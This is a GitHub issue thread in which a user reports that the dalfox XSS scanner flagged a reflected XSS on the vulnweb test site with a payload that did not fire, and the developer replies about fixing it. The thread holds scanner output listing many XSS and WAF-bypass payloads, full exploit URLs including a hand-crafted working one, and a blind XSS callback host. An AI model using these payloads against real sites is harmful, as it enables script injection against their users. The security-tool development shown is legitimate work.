Payload fails in valid XSS

[bsysop]

Hi my man! Testing your awesome tool!

Just looks it perfectly found XSS, but with wrong payload, take a look.

Just to show is a updated version:

dalfox bsysop$ git status
On branch master
Your branch is up to date with 'origin/master'.

dalfox url "http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff"

    _..._
  .' .::::.   __   _   _    ___ _ __ __
 :  :::::::: |  \ / \ | |  | __/ \\ V /
 :  :::::::: | o ) o || |_ | _( o )) (
 '. '::::::' |__/|_n_||___||_| \_//_n_\
   '-.::''

Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[*] Using single target mode
[*] Target URL: http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff
[*] Vaild target [ code:200 / size:4699 ]
[*] Start parameter analysis.. 🔍
[*] Start static analysis.. 🔍
[I] Content-Type is text/html
[I] Reflected cat param => inHTML[1]   $
    48 line:  	Error: Unknown column '123DalFox' in 'where cl
[*] Generate XSS payload and optimization.Optimization.. 🛠
[*] Added your blind XSS (https://vrsky.xss.ht)
[*] Start XSS Scanning.. with 149 queries 🗡
[W] Reflected Payload in HTML: cat="><iFrAme/src=jaVascRipt:alert(45)></iFramE>
    48 line:  syntax to use near '"><iFrAme/src=jaVascRipt:alert(45)></iFramE>' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3CiFrAme%2Fsrc%3DjaVascRipt%3Aalert%2845%29%3E%3C%2FiFramE%3E
[W] Reflected Payload in HTML: cat="><SvG/onload=alert(45) id=dalfox>
    48 line:  syntax to use near '"><SvG/onload=alert(45) id=dalfox>' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3CSvG%2Fonload%3Dalert%2845%29+id%3Ddalfox%3E
[W] Reflected Payload in HTML: cat='>asd
    48 line:  syntax to use near ''>asd' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%27%3Easd
[W] Reflected Payload in HTML: cat="><svg/OnLoad="`${prompt``}`">
    48 line:  syntax to use near '"><svg/OnLoad="`${prompt``}`">' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22%3E
[W] Reflected Payload in HTML: cat="><d3"<"/onclick="45 class=dalfox>[confirm``]"<">z
    48 line:  syntax to use near '"><d3"<"/onclick="45 class=dalfox>[confirm``]"<">z' at line
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cd3%22%3C%22%2Fonclick%3D%2245+class%3Ddalfox%3E%5Bconfirm%60%60%5D%22%3C%22%3Ez
[W] Reflected Payload in HTML: cat='"><img/src/onerror=.1|alert``>
    48 line:  syntax to use near ''"><img/src/onerror=.1|alert``>' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%27%22%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60%3E
[W] Reflected Payload in HTML: cat="><script/"<a"/src=data:=".<a,[45].some(confirm)>
    48 line:  syntax to use near '"><script/"<a"/src=data:=".<a,[45].some(confirm)>' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cscript%2F%22%3Ca%22%2Fsrc%3Ddata%3A%3D%22.%3Ca%2C%5B45%5D.some%28confirm%29%3E
[W] Reflected Payload in HTML: cat="><w="/x="y>"/class=dalfox/ondblclick=`<`[confirm``]>z
    48 line:  syntax to use near '"><w="/x="y>"/class=dalfox/ondblclick=`<`[confirm``]>z' at l
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cw%3D%22%2Fx%3D%22y%3E%22%2Fclass%3Ddalfox%2Fondblclick%3D%60%3C%60%5Bconfirm%60%60%5D%3Ez
[V] Triggered XSS Payload (found DOM Object): cat=</script><svg><script/class=dalfox>alert(45)-%26apos%3B

    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%3C%2Fscript%3E%3Csvg%3E%3Cscript%2Fclass%3Ddalfox%3Ealert%2845%29-%26apos%3B
[*] Finish :D

Until now is good, says we found a XSS there, lets take a looks:

[V] Triggered XSS Payload (found DOM Object): cat=</script><svg><script/class=dalfox>alert(45)-%26apos%3B

So it will be:

http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=%3C/script%3E%3Csvg%3E%3Cscript/class=dalfox%3Ealert(45)-%26apos%3B

But that dont pop XSS.

I just change a little it to confirm is a valid find.

http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%3C%2Fscript%3E%3Cscript%3Ealert%2845%29;%3C/script%3E/*

Thanks mate.

PS: Would be very nice a "dalfox -v" to show version, when people open issues they can always send it to show they have updated version, saves your time with wrong issues.

[bsysop]

I run again and it give me a different payload, thats awesome!

[hahwul]

Hi @bsysop
Well, first of all, I need to fix that payload. (it is WAF Bypassing payload, but I think we should increase the probability of triggering.)

I'll commit and reflect it when it's modified! And the version option will be add with the update option at the release! (Maybe this weekend)

Thank you so much for your good opinion, my friend :D

[hahwul]

Oh, and to prevent too many relfected log, I've been blocking the checking of that parameter since verify was successful. so the payload found will be different for each test case.

The important thing is that the parameter is vulnerable lol

[bsysop]

100% agree! Most important feature is detection!

Thank you very much brother, i tell you when finish my tests.

[hahwul]

Thank you so much for always helping me a lot 👍